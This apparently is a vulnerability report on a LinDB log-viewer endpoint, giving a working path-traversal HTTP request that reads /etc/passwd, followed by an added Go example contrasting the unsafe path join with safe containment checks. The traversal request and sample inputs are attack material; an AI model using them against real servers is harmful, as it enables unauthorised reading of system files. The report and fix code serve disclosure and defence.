Hello, I just found a security issue in the Log View endpoint: an attacker can arbitrarily read local files via the "file" parameter.
Here is the HTTP request for reading /etc/passwd:
[code]
GET /api/v1/log/view?file=../../../../../../../../../etc/passwd HTTP/1.1
Host: lindb:9000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://lindb:9000/console/assets/index.8a526aef.js
[/code]
Here is the line from the source code:
lindb/internal/monitoring/log_handle.go
Line 126 in 1966dd6
The log viewer must read only files in the logfiles directory. Please fix this issue and request a CVE.
LinDB: v0.1.1, BuildDate: 2023-01-18T11:28:06+0900
GOOS="linux"
GOARCH="amd64"
GOVERSION="go1.19.3"
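The report above describes the classic Go path traversal: a user-supplied file name is joined onto the log directory and the result is opened without checking that it still lies inside that directory. The following is an added example written for this page, not LinDB's own handler code and not the maintainer's fix. It assumes a log directory of /var/log/lindb (used only for path arithmetic) and shows the vulnerable join beside two contained variants: an explicit containment check built on filepath.Rel, and a version that delegates the check to os.DirFS from the standard library.

```go
package main

import (
	"errors"
	"fmt"
	"io/fs"
	"os"
	"path/filepath"
	"strings"
)

// ErrOutsideLogDir is returned when a requested name would resolve outside the log directory.
var ErrOutsideLogDir = errors.New("requested file is outside the log directory")

// unsafeLogPath reproduces the traversal pattern from the report: the
// user-supplied name is joined onto the log directory and the result is
// trusted. filepath.Join runs filepath.Clean, which resolves ".." against
// logDir instead of rejecting it, so "../../../etc/passwd" walks out of the
// directory and the handler ends up opening /etc/passwd.
func unsafeLogPath(logDir, requested string) string {
	return filepath.Join(logDir, requested)
}

// safeLogPath joins and then verifies containment: the cleaned candidate must
// be a strict descendant of logDir. Empty and absolute names, and the log
// directory itself, are rejected outright.
func safeLogPath(logDir, requested string) (string, error) {
	if requested == "" || filepath.IsAbs(requested) {
		return "", ErrOutsideLogDir
	}
	base, err := filepath.Abs(logDir)
	if err != nil {
		return "", err
	}
	candidate := filepath.Join(base, requested) // already cleaned, ".." collapsed
	rel, err := filepath.Rel(base, candidate)
	if err != nil {
		return "", err
	}
	// After cleaning, any escape shows up as a leading ".." element in the
	// path relative to base; "." means the caller asked for the directory itself.
	if rel == "." || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrOutsideLogDir
	}
	return candidate, nil
}

// readLogFile lets the standard library do the containment check: os.DirFS
// only accepts valid, unrooted fs paths (no "." or ".." elements, no leading
// "/"), and returns fs.ErrInvalid before touching the filesystem otherwise.
// Symlinks inside logDir are still followed, so a symlink planted there by a
// local attacker would escape; keep the log directory writable only by the
// service account.
func readLogFile(logDir, requested string) ([]byte, error) {
	return fs.ReadFile(os.DirFS(logDir), requested)
}

func main() {
	const logDir = "/var/log/lindb" // assumed location, used only for path arithmetic
	// Constructed sample inputs: a benign name and two traversal attempts.
	for _, name := range []string{"lindb.log", "../../../../../../../../../etc/passwd", "sub/../../etc/passwd"} {
		fmt.Printf("%q -> unsafe join: %s\n", name, unsafeLogPath(logDir, name))
		if p, err := safeLogPath(logDir, name); err != nil {
			fmt.Printf("%q -> safe join: rejected (%v)\n", name, err)
		} else {
			fmt.Printf("%q -> safe join: %s\n", name, p)
		}
	}
}
```

The "sub/../../etc/passwd" case is why the check must run on the cleaned result rather than on the raw parameter: a naive "does the name start with .." test passes it, while filepath.Join still collapses it to /var/log/etc/passwd. On Go 1.20 and later filepath.IsLocal(requested) expresses the same rule in one call, and Go 1.24's os.OpenRoot additionally refuses to follow symlinks out of the directory, which neither variant above does.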
fixed